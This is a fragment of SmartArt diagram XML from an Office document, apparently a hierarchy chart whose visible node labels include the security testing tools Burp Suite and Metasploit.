    <dgm:pt modelId="{F2D0C094-40A5-4374-9A4C-112204C34780}" type="parTrans" cxnId="{0D1DB255-A7CA-4D2F-B295-689F7197895E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AB9E59F6-AFC3-4E27-942B-ECDD27A90B46}" type="sibTrans" cxnId="{0D1DB255-A7CA-4D2F-B295-689F7197895E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{85B70814-7119-454E-8F90-AEEF0B103084}" type="pres">
      <dgm:prSet presAssocID="{B9967311-6D61-419F-9D1E-2FD24BA970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50F526-10E4-494B-A923-BAB8535F6A2F}" type="pres">
      <dgm:prSet presAssocID="{1A967E33-D1B5-40E1-82CA-F63E104735F1}" presName="root1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4F2EE09D-CF03-49D3-9A80-9E0807295655}" type="pres">
      <dgm:prSet presAssocID="{1A967E33-D1B5-40E1-82CA-F63E104735F1}" presName="LevelOneTextNode" presStyleLbl="node0" presStyleIdx="0" presStyleCnt="1">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{126A8BE2-AF9F-42AC-AD3E-B77EC2EF8229}" type="pres">
      <dgm:prSet presAssocID="{1A967E33-D1B5-40E1-82CA-F63E104735F1}" presName="level2hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B3870EF8-E226-491B-9A8D-94118E972F77}" type="pres">
      <dgm:prSet presAssocID="{D7AA7D8F-70B0-47A8-A4AB-B2255B90FBCD}" presName="conn2-1" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3B0056F7-057E-4F59-939D-340E1D679EB6}" type="pres">
      <dgm:prSet presAssocID="{D7AA7D8F-70B0-47A8-A4AB-B2255B90FBCD}" presName="connTx" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C063BE05-A1F6-40AA-8C4C-A59AA2C16EC7}" type="pres">
      <dgm:prSet presAssocID="{75B10601-D994-4AE8-AA18-8920266BA425}" presName="root2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5B449135-50FA-411A-87E6-68D99E38F9AD}" type="pres">
      <dgm:prSet presAssocID="{75B10601-D994-4AE8-AA18-8920266BA425}" presName="LevelTwoTextNode" presStyleLbl="node2" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DC3101A9-A90C-4396-AE98-53EB67F83A0C}" type="pres">
      <dgm:prSet presAssocID="{75B10601-D994-4AE8-AA18-8920266BA425}" presName="level3hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DC000199-A63A-4F6D-B581-DB2D573A58A1}" type="pres">
      <dgm:prSet presAssocID="{72054474-C049-487D-AEE2-C163A071DF92}" presName="conn2-1" presStyleLbl="parChTrans1D2" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EA93596E-FEC6-4038-888C-66088660B02D}" type="pres">
      <dgm:prSet presAssocID="{72054474-C049-487D-AEE2-C163A071DF92}" presName="connTx" presStyleLbl="parChTrans1D2" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B9B5E978-E890-4B72-B2AC-D55F77F6B37C}" type="pres">
      <dgm:prSet presAssocID="{C409427F-3D2D-45C1-984C-D5A48177A1BE}" presName="root2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{50209067-CD63-48B2-8845-7E70BB001747}" type="pres">
      <dgm:prSet presAssocID="{C409427F-3D2D-45C1-984C-D5A48177A1BE}" presName="LevelTwoTextNode" presStyleLbl="node2" presStyleIdx="1" presStyleCnt="5" custScaleY="124496">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C1ACF7FA-1521-4D30-97B5-B7C1CD200361}" type="pres">
      <dgm:prSet presAssocID="{C409427F-3D2D-45C1-984C-D5A48177A1BE}" presName="level3hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{515476AD-CB98-4717-A892-CE1AE84F5D72}" type="pres">
      <dgm:prSet presAssocID="{84F80D6F-44F9-4143-AF83-8BFB13F0A8BA}" presName="conn2-1" presStyleLbl="parChTrans1D2" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F068C259-059C-4CC5-8652-F5B665FB5718}" type="pres">
      <dgm:prSet presAssocID="{84F80D6F-44F9-4143-AF83-8BFB13F0A8BA}" presName="connTx" presStyleLbl="parChTrans1D2" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7C1831AE-A1F9-4373-ADF9-5040E6F0E8FE}" type="pres">
      <dgm:prSet presAssocID="{6371E9DA-FB0B-4721-A273-13440CE6AA18}" presName="root2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{943F440C-FD04-493E-8B4E-11F22D5A36E2}" type="pres">
      <dgm:prSet presAssocID="{6371E9DA-FB0B-4721-A273-13440CE6AA18}" presName="LevelTwoTextNode" presStyleLbl="node2" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{17AD3371-AA6D-49CA-88A1-4646099CC444}" type="pres">
      <dgm:prSet presAssocID="{6371E9DA-FB0B-4721-A273-13440CE6AA18}" presName="level3hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A3424FEE-6A33-4D80-B236-41B595EF87EB}" type="pres">
      <dgm:prSet presAssocID="{9EE820CD-F6AF-4FD9-A491-35E29AB264DA}" presName="conn2-1" presStyleLbl="parChTrans1D2" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A6AC1673-F3EA-427B-BF28-953C6AC27FB3}" type="pres">
      <dgm:prSet presAssocID="{9EE820CD-F6AF-4FD9-A491-35E29AB264DA}" presName="connTx" presStyleLbl="parChTrans1D2" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DB861491-C94B-446F-BC15-56448202030E}" type="pres">
      <dgm:prSet presAssocID="{371B02C2-F95B-44A8-BAA0-5568C052449B}" presName="root2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{93B7F0A3-5CF4-44F3-A202-61506D047FF5}" type="pres">
      <dgm:prSet presAssocID="{371B02C2-F95B-44A8-BAA0-5568C052449B}" presName="LevelTwoTextNode" presStyleLbl="node2" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7AF8CB9C-6D76-47ED-9ADE-249E64786824}" type="pres">
      <dgm:prSet presAssocID="{371B02C2-F95B-44A8-BAA0-5568C052449B}" presName="level3hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9E482FF0-62B5-4F85-BE93-5B460564776F}" type="pres">
      <dgm:prSet presAssocID="{F2D0C094-40A5-4374-9A4C-112204C34780}" presName="conn2-1" presStyleLbl="parChTrans1D2" presStyleIdx="4" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F1C8159F-1C61-4719-BB73-661BD8EB4095}" type="pres">
      <dgm:prSet presAssocID="{F2D0C094-40A5-4374-9A4C-112204C34780}" presName="connTx" presStyleLbl="parChTrans1D2" presStyleIdx="4" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{863D8CBF-E0F9-4AE2-8B79-36956DBA9AC1}" type="pres">
      <dgm:prSet presAssocID="{C25B1FAF-EBF9-4076-AA5B-738FDBD5BD89}" presName="root2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0AB94F55-0FD9-4828-A93D-20490EBB7E8D}" type="pres">
      <dgm:prSet presAssocID="{C25B1FAF-EBF9-4076-AA5B-738FDBD5BD89}" presName="LevelTwoTextNode" presStyleLbl="node2" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{42176772-F197-49CA-A663-8BB4B5A9216F}" type="pres">
      <dgm:prSet presAssocID="{C25B1FAF-EBF9-4076-AA5B-738FDBD5BD89}" presName="level3hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{C60F6C06-98A1-4319-9DFA-8FBA173CB224}" type="presOf" srcId="{1A967E33-D1B5-40E1-82CA-F63E104735F1}" destId="{4F2EE09D-CF03-49D3-9A80-9E0807295655}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{B249AD07-BC78-4524-AD1D-096AFE7FC10C}" type="presOf" srcId="{72054474-C049-487D-AEE2-C163A071DF92}" destId="{DC000199-A63A-4F6D-B581-DB2D573A58A1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{94A93314-0537-4D3B-9396-721FD15080C6}" type="presOf" srcId="{F2D0C094-40A5-4374-9A4C-112204C34780}" destId="{F1C8159F-1C61-4719-BB73-661BD8EB4095}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{3144771A-10C5-4274-AF74-ED93076095F7}" type="presOf" srcId="{D7AA7D8F-70B0-47A8-A4AB-B2255B90FBCD}" destId="{3B0056F7-057E-4F59-939D-340E1D679EB6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{7781422A-40D8-4EE0-8CCE-02F8A19154A5}" type="presOf" srcId="{371B02C2-F95B-44A8-BAA0-5568C052449B}" destId="{93B7F0A3-5CF4-44F3-A202-61506D047FF5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{488F3A3A-9686-4480-A904-842B99F3F49E}" type="presOf" srcId="{B9967311-6D61-419F-9D1E-2FD24BA970DC}" destId="{85B70814-7119-454E-8F90-AEEF0B103084}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{8466B441-0319-4C5E-9209-915D7A4788D2}" srcId="{1A967E33-D1B5-40E1-82CA-F63E104735F1}" destId="{C409427F-3D2D-45C1-984C-D5A48177A1BE}" srcOrd="1" destOrd="0" parTransId="{72054474-C049-487D-AEE2-C163A071DF92}" sibTransId="{960580DD-E68D-4136-A8D7-33F604C7C107}"/>
    <dgm:cxn modelId="{817DBB71-A9F5-4451-B0F2-406ECB3E4A42}" srcId="{1A967E33-D1B5-40E1-82CA-F63E104735F1}" destId="{75B10601-D994-4AE8-AA18-8920266BA425}" srcOrd="0" destOrd="0" parTransId="{D7AA7D8F-70B0-47A8-A4AB-B2255B90FBCD}" sibTransId="{C2A1280C-8FFB-4443-8F2D-E3F3C502ECA7}"/>
    <dgm:cxn modelId="{0D1DB255-A7CA-4D2F-B295-689F7197895E}" srcId="{1A967E33-D1B5-40E1-82CA-F63E104735F1}" destId="{C25B1FAF-EBF9-4076-AA5B-738FDBD5BD89}" srcOrd="4" destOrd="0" parTransId="{F2D0C094-40A5-4374-9A4C-112204C34780}" sibTransId="{AB9E59F6-AFC3-4E27-942B-ECDD27A90B46}"/>
    <dgm:cxn modelId="{7F83B383-21CC-4014-9DC1-2D69C989C884}" type="presOf" srcId="{D7AA7D8F-70B0-47A8-A4AB-B2255B90FBCD}" destId="{B3870EF8-E226-491B-9A8D-94118E972F77}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{14A57B86-2153-4E52-B630-521631F11B34}" type="presOf" srcId="{75B10601-D994-4AE8-AA18-8920266BA425}" destId="{5B449135-50FA-411A-87E6-68D99E38F9AD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{FCE41792-7E4D-4C9A-A0D5-FDED35E7BBF7}" srcId="{1A967E33-D1B5-40E1-82CA-F63E104735F1}" destId="{6371E9DA-FB0B-4721-A273-13440CE6AA18}" srcOrd="2" destOrd="0" parTransId="{84F80D6F-44F9-4143-AF83-8BFB13F0A8BA}" sibTransId="{2DD7E52A-DAE4-4679-BFE8-C72CE5091204}"/>
    <dgm:cxn modelId="{A48B58B7-5ACA-4E03-A55A-4551243A2DC9}" type="presOf" srcId="{C25B1FAF-EBF9-4076-AA5B-738FDBD5BD89}" destId="{0AB94F55-0FD9-4828-A93D-20490EBB7E8D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{9CC7E0C7-B52F-4D33-9F92-133E67B5EEEC}" type="presOf" srcId="{72054474-C049-487D-AEE2-C163A071DF92}" destId="{EA93596E-FEC6-4038-888C-66088660B02D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{225182DA-13C7-4D13-99B7-534049762754}" type="presOf" srcId="{9EE820CD-F6AF-4FD9-A491-35E29AB264DA}" destId="{A6AC1673-F3EA-427B-BF28-953C6AC27FB3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{CE22CBEA-EBFB-498C-8919-8BE67DBBFD90}" srcId="{1A967E33-D1B5-40E1-82CA-F63E104735F1}" destId="{371B02C2-F95B-44A8-BAA0-5568C052449B}" srcOrd="3" destOrd="0" parTransId="{9EE820CD-F6AF-4FD9-A491-35E29AB264DA}" sibTransId="{13321D8D-5EE7-4715-AB41-B0A24FFB7390}"/>
    <dgm:cxn modelId="{94F469EC-824F-4F74-80C5-9FFE9AE9BA60}" type="presOf" srcId="{84F80D6F-44F9-4143-AF83-8BFB13F0A8BA}" destId="{F068C259-059C-4CC5-8652-F5B665FB5718}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{B16556EF-8B44-4234-A587-43FDD2CA0F5F}" type="presOf" srcId="{C409427F-3D2D-45C1-984C-D5A48177A1BE}" destId="{50209067-CD63-48B2-8845-7E70BB001747}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{38BA21F0-0FF7-4FDA-8244-5F5E99092273}" type="presOf" srcId="{84F80D6F-44F9-4143-AF83-8BFB13F0A8BA}" destId="{515476AD-CB98-4717-A892-CE1AE84F5D72}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{5B7145F4-DDFB-4B1E-8F30-AEB266C2140B}" type="presOf" srcId="{6371E9DA-FB0B-4721-A273-13440CE6AA18}" destId="{943F440C-FD04-493E-8B4E-11F22D5A36E2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{E7D88AF4-4C85-448E-BFEF-75C11569F94D}" type="presOf" srcId="{9EE820CD-F6AF-4FD9-A491-35E29AB264DA}" destId="{A3424FEE-6A33-4D80-B236-41B595EF87EB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{D279E1F6-F170-4751-8920-058FA8F4BF6D}" type="presOf" srcId="{F2D0C094-40A5-4374-9A4C-112204C34780}" destId="{9E482FF0-62B5-4F85-BE93-5B460564776F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{42F1B6F9-5250-4E16-A690-35355580B073}" srcId="{B9967311-6D61-419F-9D1E-2FD24BA970DC}" destId="{1A967E33-D1B5-40E1-82CA-F63E104735F1}" srcOrd="0" destOrd="0" parTransId="{236D3005-FFD4-4A93-B2D8-3C5EBE1215C1}" sibTransId="{868D5A9C-7157-4C49-9DBA-5783E98738B9}"/>
    <dgm:cxn modelId="{9C6A7571-D961-446F-B5F0-F6DC6CE1660E}" type="presParOf" srcId="{85B70814-7119-454E-8F90-AEEF0B103084}" destId="{C150F526-10E4-494B-A923-BAB8535F6A2F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{8ADF6251-F9D6-48A4-838A-DA891768CC44}" type="presParOf" srcId="{C150F526-10E4-494B-A923-BAB8535F6A2F}" destId="{4F2EE09D-CF03-49D3-9A80-9E0807295655}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{56DA2390-2A52-468F-89AE-6832565AACD1}" type="presParOf" srcId="{C150F526-10E4-494B-A923-BAB8535F6A2F}" destId="{126A8BE2-AF9F-42AC-AD3E-B77EC2EF8229}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{CD6CE232-A7A0-4539-9FDD-14C93EC6B62B}" type="presParOf" srcId="{126A8BE2-AF9F-42AC-AD3E-B77EC2EF8229}" destId="{B3870EF8-E226-491B-9A8D-94118E972F77}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{0D96CF9E-5FE2-4EFB-B9B1-6C4B793BE0F3}" type="presParOf" srcId="{B3870EF8-E226-491B-9A8D-94118E972F77}" destId="{3B0056F7-057E-4F59-939D-340E1D679EB6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{503506CB-A71E-42BF-9FB7-D5BA29A99F34}" type="presParOf" srcId="{126A8BE2-AF9F-42AC-AD3E-B77EC2EF8229}" destId="{C063BE05-A1F6-40AA-8C4C-A59AA2C16EC7}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{2F8B902D-17DD-4D0E-B7AB-F77B368EE0C0}" type="presParOf" srcId="{C063BE05-A1F6-40AA-8C4C-A59AA2C16EC7}" destId="{5B449135-50FA-411A-87E6-68D99E38F9AD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{EC6D1907-84CE-4904-9168-79EC96F1640F}" type="presParOf" srcId="{C063BE05-A1F6-40AA-8C4C-A59AA2C16EC7}" destId="{DC3101A9-A90C-4396-AE98-53EB67F83A0C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{B0DDA757-4714-4ACF-BC76-66E8D0F848BC}" type="presParOf" srcId="{126A8BE2-AF9F-42AC-AD3E-B77EC2EF8229}" destId="{DC000199-A63A-4F6D-B581-DB2D573A58A1}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{62ACC43D-4D66-4B90-A031-C0FA7B543ED2}" type="presParOf" srcId="{DC000199-A63A-4F6D-B581-DB2D573A58A1}" destId="{EA93596E-FEC6-4038-888C-66088660B02D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{C69B389A-D027-4B18-B9D0-BA86CC99F98F}" type="presParOf" srcId="{126A8BE2-AF9F-42AC-AD3E-B77EC2EF8229}" destId="{B9B5E978-E890-4B72-B2AC-D55F77F6B37C}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{6612910F-9FE7-4FB0-8F1A-73C61255F76D}" type="presParOf" srcId="{B9B5E978-E890-4B72-B2AC-D55F77F6B37C}" destId="{50209067-CD63-48B2-8845-7E70BB001747}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{23848E1E-0979-4F0C-8826-458B872EDC50}" type="presParOf" srcId="{B9B5E978-E890-4B72-B2AC-D55F77F6B37C}" destId="{C1ACF7FA-1521-4D30-97B5-B7C1CD200361}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{B6BB4C55-ED6F-4C2F-962E-CEF27E3629B0}" type="presParOf" srcId="{126A8BE2-AF9F-42AC-AD3E-B77EC2EF8229}" destId="{515476AD-CB98-4717-A892-CE1AE84F5D72}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{DE69D185-8F6E-4B55-909E-9ADAA36FB3E8}" type="presParOf" srcId="{515476AD-CB98-4717-A892-CE1AE84F5D72}" destId="{F068C259-059C-4CC5-8652-F5B665FB5718}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{CFD4B72C-0C5F-4F92-AB9C-8BBA2EA7F07C}" type="presParOf" srcId="{126A8BE2-AF9F-42AC-AD3E-B77EC2EF8229}" destId="{7C1831AE-A1F9-4373-ADF9-5040E6F0E8FE}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{1C2E27ED-3C37-431C-AA51-9A484E3ED265}" type="presParOf" srcId="{7C1831AE-A1F9-4373-ADF9-5040E6F0E8FE}" destId="{943F440C-FD04-493E-8B4E-11F22D5A36E2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{26DAF7A5-A326-4F4C-B655-165A1496E014}" type="presParOf" srcId="{7C1831AE-A1F9-4373-ADF9-5040E6F0E8FE}" destId="{17AD3371-AA6D-49CA-88A1-4646099CC444}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{ACBF2B41-36B4-4807-B231-3BDDD6FD7D7B}" type="presParOf" srcId="{126A8BE2-AF9F-42AC-AD3E-B77EC2EF8229}" destId="{A3424FEE-6A33-4D80-B236-41B595EF87EB}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{9DF1E1EE-2040-4C5F-9129-F65155CDB6F5}" type="presParOf" srcId="{A3424FEE-6A33-4D80-B236-41B595EF87EB}" destId="{A6AC1673-F3EA-427B-BF28-953C6AC27FB3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{7760C1FF-C03D-4EB5-A9FA-E18CE93591FC}" type="presParOf" srcId="{126A8BE2-AF9F-42AC-AD3E-B77EC2EF8229}" destId="{DB861491-C94B-446F-BC15-56448202030E}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{015A6B9F-A3D8-4EBF-9F69-C3E0DB25424B}" type="presParOf" srcId="{DB861491-C94B-446F-BC15-56448202030E}" destId="{93B7F0A3-5CF4-44F3-A202-61506D047FF5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{FCD35D30-4769-45A0-B71E-810AE1C96E2B}" type="presParOf" srcId="{DB861491-C94B-446F-BC15-56448202030E}" destId="{7AF8CB9C-6D76-47ED-9ADE-249E64786824}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{A83E95BA-7DC2-41BE-9D7E-F79994C737E7}" type="presParOf" srcId="{126A8BE2-AF9F-42AC-AD3E-B77EC2EF8229}" destId="{9E482FF0-62B5-4F85-BE93-5B460564776F}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{459EB900-87EC-4FEC-A17C-F733F1A97185}" type="presParOf" srcId="{9E482FF0-62B5-4F85-BE93-5B460564776F}" destId="{F1C8159F-1C61-4719-BB73-661BD8EB4095}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{C663BA49-E9C3-415F-8275-19AAB38586F3}" type="presParOf" srcId="{126A8BE2-AF9F-42AC-AD3E-B77EC2EF8229}" destId="{863D8CBF-E0F9-4AE2-8B79-36956DBA9AC1}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{DABF9D02-6E1C-4580-AE27-24E2BF41D6C9}" type="presParOf" srcId="{863D8CBF-E0F9-4AE2-8B79-36956DBA9AC1}" destId="{0AB94F55-0FD9-4828-A93D-20490EBB7E8D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{60677265-54A6-44EE-A03E-66100A4D0449}" type="presParOf" srcId="{863D8CBF-E0F9-4AE2-8B79-36956DBA9AC1}" destId="{42176772-F197-49CA-A663-8BB4B5A921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99A78-1554-438F-B318-5690E1F072D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A6FEE0-531D-46B2-AEC2-FA76A26B3F9C}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
            <a:t>Burp Suite</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4380442B-D32A-48C3-9973-32F9B92DED6D}" type="parTrans" cxnId="{6D0E2008-C11F-4189-863A-D3C2BE8C6A99}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4B8C9466-33F7-4B23-AF67-5BA11C363F0F}" type="sibTrans" cxnId="{6D0E2008-C11F-4189-863A-D3C2BE8C6A99}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7CB6FBAE-10FA-4A03-9C6F-56207BDDEEA7}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
            <a:t>Metasploit</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{86594B5D-00B2-47E8-BE05-61E05F58E569}" type="parTrans" cxnId="{FAA62B2D-1710-4EFF-A619-CA9BD2EC6EB9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D1276E83-7D0C-4434-85D4-3DF63B818B2A}" type="sibTrans" cxnId="{FAA62B2D-1710-4EFF-A619-CA9BD2EC6EB9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
